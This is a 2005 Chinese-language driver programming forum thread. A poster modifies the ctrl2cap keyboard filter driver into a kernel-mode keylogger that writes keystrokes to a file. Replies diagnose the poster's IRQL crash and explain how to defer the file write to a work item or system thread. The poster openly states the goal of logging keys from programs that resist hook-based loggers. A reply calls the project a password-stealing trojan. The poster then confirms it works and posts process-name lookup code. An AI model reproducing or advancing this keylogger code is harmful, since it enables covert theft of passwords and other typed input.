阅读:1954回复:9
为什么一ZwCreateFile就死机?
改了ctrl2cap中的Ctrl2capReadComplete函数如下:
NTSTATUS Ctrl2capReadComplete( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context ) { PIO_STACK_LOCATION IrpSp; PKEYBOARD_INPUT_DATA KeyData; int numKeys, i; //自己加的初始化处 OUT PHANDLE FileHandle=NULL; NTSTATUS ntStatus; OBJECT_ATTRIBUTES ObjectAttributes; OUT PIO_STATUS_BLOCK IoStatusBlock=NULL; UNICODE_STRING UniFileName; char* Buffer=\"t\"; int Length=0; PCWSTR FileName = L\"\\\\??\\\\d:\\\\readme.dat\"; // // Request completed - look at the result. // IrpSp = IoGetCurrentIrpStackLocation( Irp ); if( NT_SUCCESS( Irp->IoStatus.Status ) ) { // // Do caps-lock down and caps-lock up. Note that // just frobbing the MakeCode handles both the up-key // and down-key cases since the up/down information is specified // seperately in the Flags field of the keyboard input data // (0 means key-down, 1 means key-up). // KeyData = Irp->AssociatedIrp.SystemBuffer; numKeys = Irp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA); for( i = 0; i < numKeys; i++ ) { DbgPrint((\"ScanCode: %x \", KeyData.MakeCode )); DbgPrint((\"%s\\n\", KeyData.Flags ? \"Up\" : \"Down\" )); if( KeyData.MakeCode == CAPS_LOCK) { KeyData.MakeCode = LCONTROL; //自己加的,出错处: RtlInitUnicodeString(&UniFileName , FileName); InitializeObjectAttributes(&ObjectAttributes,&UniFileName, OBJ_CASE_INSENSITIVE,NULL,NULL); ntStatus=ZwCreateFile(FileHandle, GENERIC_WRITE|SYNCHRONIZE|GENERIC_READ, &ObjectAttributes, IoStatusBlock, 0, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_DELETE, FILE_OPEN_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); } } } // // Mark the Irp pending if required // if( Irp->PendingReturned ) { IoMarkIrpPending( Irp ); } return Irp->IoStatus.Status; } 为什么一按capslock就死机了?这儿不能用ZwCreateFile吗?还是我用ZwCreateFile方法不对? 请高手指教!!! |
|
沙发#
发布于:2005-06-15 09:02
可能是IRQL不正确,看看当前的IRQL
|
|
|
板凳#
发布于:2005-06-15 09:30
肯定是 IRQL 不对的,完成里程是 DISPATCH_LEVEL 而
ZwCreateFile 要求是 IRQL PASSIVE_LEVEL |
|
|
地板#
发布于:2005-06-15 10:01
谢谢俩位大佬!!!
我猜测可能也是这个原因,不知如何解决??? 敬请指教!!! |
|
地下室#
发布于:2005-06-15 10:49
谢谢俩位大佬!!! 哈哈,你是想做个偷密码的木马吧 :D不提倡这样做 :P 至于这个具体问题,先把键盘数据放到buffer中。然后创建WorkItem让系统工作线程替你在系统降到IRQL PASSIVE_LEVEL级的时候做 |
|
|
5楼#
发布于:2005-06-15 11:35
hehe
也可以PsCreateSystemThread创建一个系统线程做这件事情 |
|
6楼#
发布于:2005-06-15 16:51
bmyyyud兄弟,我只是对黑软挺感兴趣的,研究起来很有其意思,以前做个个钩子记录键盘的工具,但是近来发现有些程序用不了,就想在驱动中做,还不知道有没有效果。也是才接触驱动编程,请多指教! :D
|
|
7楼#
发布于:2005-06-15 17:23
hehe 对. |
|
|
8楼#
发布于:2005-06-15 22:22
嘿嘿, kernel mode key logger是我的第一个驱动程序,
也是从cap2ctrl改的。 ;) |
|
9楼#
发布于:2005-06-16 08:56
:P各位兄弟好!谢谢大家的指点!
现在键盘是可以记录了,对以前用钩子记录无效的程序也可以 :D 但为什么我获取当前进程名总是返回csrss.exe呢?代码如下:(出于filemon): ULONG FilemonGetProcessNameOffset() { PEPROCESS curproc; int i; curproc = PsGetCurrentProcess(); // // Scan for 12KB, hoping the KPEB never grows that big! // for( i = 0; i < 3*PAGE_SIZE; i++ ) { if( !strncmp( SYSNAME, (PCHAR) curproc + i, strlen(SYSNAME) )) { return i; } } // // Name not found - oh, well // return 0; } PCHAR FilemonGetProcess( PCHAR Name ) { #if GETPROCESS PEPROCESS curproc; char *nameptr; ULONG i; KIRQL oldirql; // // We only do this if we determined the process name offset // if( ProcessNameOffset ) { // // Get a pointer to the current process block // curproc = PsGetCurrentProcess(); //curproc = IoGetCurrentProcess(); // // Dig into it to extract the name // nameptr = (PCHAR) curproc + ProcessNameOffset; //DbgPrint((\"Ctrl2cap: nameptr:%s!\\n\",nameptr)); strncpy( Name, nameptr, NT_PROCNAMELEN ); // // Terminate in case process name overflowed // Name[NT_PROCNAMELEN] = 0; //DbgPrint((\"Ctrl2cap: Name:%s &&&!\\n\",Name)); return Name; } else { strcpy( Name, \"???\" ); return Name; } #else // // We\'re not getting names, so just return something // strcpy( Name, \"??\" ); return Name; #endif } 我用DbgView看了一下,不管我在哪个程序中敲键盘,这儿返回的Name全是csrss.exe,真是奇怪!!! :( 请大家继续指教!!! |
|